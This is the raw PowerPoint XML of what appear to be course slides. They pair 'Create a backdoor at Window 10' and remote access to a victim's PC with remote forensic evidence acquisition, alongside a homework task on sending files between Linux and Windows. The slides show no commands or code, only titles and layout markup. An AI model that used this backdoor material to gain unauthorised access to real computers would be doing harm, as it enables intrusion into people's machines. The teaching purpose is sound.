      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="997234" y="1818895"/>
            <a:ext cx="8953541" cy="370697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BD06D31-7CAC-5B43-D03B-877056D08B72}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6499847" y="5989599"/>
              <a:ext cx="4320" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD06D31-7CAC-5B43-D03B-877056D08B72}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6490847" y="5980599"/>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CCE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6641327" y="6123879"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6632687" y="6115239"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31161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Hands on keyboard and mouse">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A6CCCE4-31A8-5F65-9EED-498D66247555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="27230" r="4001"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4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668866" y="1678666"/>
            <a:ext cx="5123515" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>Your work</a:t>
            </a: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lide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914400">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>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3379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Goal : Communication between two machines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="40116" y="2118247"/>
            <a:ext cx="12111769" cy="2621507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="684404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286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Isosceles Triangle 2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Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F06D97-06B1-8242-F80E-71A668491908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288193656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100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4DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757675" y="1053703"/>
            <a:ext cx="10258981" cy="47635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3BF08B5-58DD-CB09-FD46-A825C6314B9A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6202127" y="6060519"/>
              <a:ext cx="1440" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63BF08B5-58DD-CB09-FD46-A825C6314B9A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6193127" y="6051519"/>
                <a:ext cx="19080" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2427580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4DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6948606" y="3353537"/>
            <a:ext cx="1035004" cy="11314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6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360017" y="4733552"/>
            <a:ext cx="5068007" cy="1092352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1"/>
            <a:ext cx="6399252" cy="4140017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E051C2F-9025-48D3-8554-B0E0E3B004AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7169124" y="2135515"/>
            <a:ext cx="4623638" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This slide: send a file from Linux to Win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your homework is: sent a file from Win to Linux</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DFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10901567" y="1395999"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10892567" y="1387359"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156228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1"/>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8" name="Straight Connector 27">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32" name="Isosceles Triangle 31">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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829734" y="854529"/>
            <a:ext cx="5799665" cy="5148943"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000"/>
              <a:t>Create a backdoor at Window 10/Remote File Acquisition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9603035" y="5946112"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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6C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5897369" y="1658403"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5888369" y="1649763"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1035595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C4124-87C8-4743-8E1C-273BB86DC97E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7032E3DA-7F7C-4137-9921-D28D7A17B054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack: Remote access a victim’s PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Forensic: Remote evidence acquisition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3063836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Backdoor background</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="691306" y="3101419"/>
            <a:ext cx="9244345" cy="2167923"/>
            <a:chOff x="1220568" y="4947656"/>
            <a:chExt cx="16789969" cy="4722849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531579" y="5705086"/>
              <a:ext cx="2122268" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663171"/>
              <a:ext cx="2164425" cy="1023276"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1867" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="380241"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
